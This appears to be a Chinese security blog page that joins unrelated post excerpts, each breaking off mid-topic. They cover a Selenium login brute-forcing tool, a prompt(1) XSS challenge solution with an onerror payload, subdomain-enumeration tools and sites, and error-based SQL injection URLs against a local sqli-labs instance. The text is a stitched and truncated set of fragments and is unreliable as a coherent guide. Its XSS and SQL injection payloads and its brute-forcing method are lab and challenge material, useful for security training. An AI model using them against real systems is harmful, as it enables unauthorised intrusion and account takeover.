selenium自动化爆破工具

某一天测试公司某个业务的时候发现，虽然页面没有验证码，但是抓包之后一直有个sign值，而且每次的会话这个值都会变，改了之后后端会报错提示 sign值不合法。

我这暴脾气，立马看源码就准备逆了它，看着就来气。调了半天，woc全tm混淆的，代码读的我眼睛疼。算了，此处不留爷，自有留爷处，从界面下手，直接自动化爆破算了。

虽然网上已经有很多同类的东西了，但自己造轮子才能提高啊，就着手写了。

基础知识+环境配置

我是mac的环境，使用python2.7+chromedriver实现
首先使用homebrew安装chromedriver
brew cask install chromedriver
pip install selenium

至此，环境准备结束，该补充selenium的知识了。

官方手册送上：https://selenium-python.readthedocs.io/
核心知识：
1.elementLocation
2.webdriver

prompt(1) to win 通关笔记

网址：http://prompt.ml
基于alert(1)做的xss闯关游戏

level 0

1
2
3
4
5

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

代码是input标签的xss，没有过滤，直接闭合双引号插入常规paylaod即可

1

a"><img src=x onerror=prompt(1)>//

信息收集(Web篇)

0x00 子域名收集

工具

1、子域名挖掘机、lijiejieSubDomain

需要自己维护一套字典才能有很好的效果，你字典越全爆破效果越好。

2、在线子域名收集

https://d.chinacycc.com/

http://z.zcjun.com/ (字典已搞到)

https://phpinfo.me/domain/

3.test404轻量title获取器

4.SSL证书获取子域名

方法一：报错注入extractvalue()

判断注入点：
输入单引号，发现页面报错 http://172.16.173.131/sqli-labs/Less-1/?id=1'

闭合前一个单引号，注释掉后一个，并加入判断payload
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+

所以利用extractvalue()报错注入
先判断函数是否可执行
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,md5(123));--+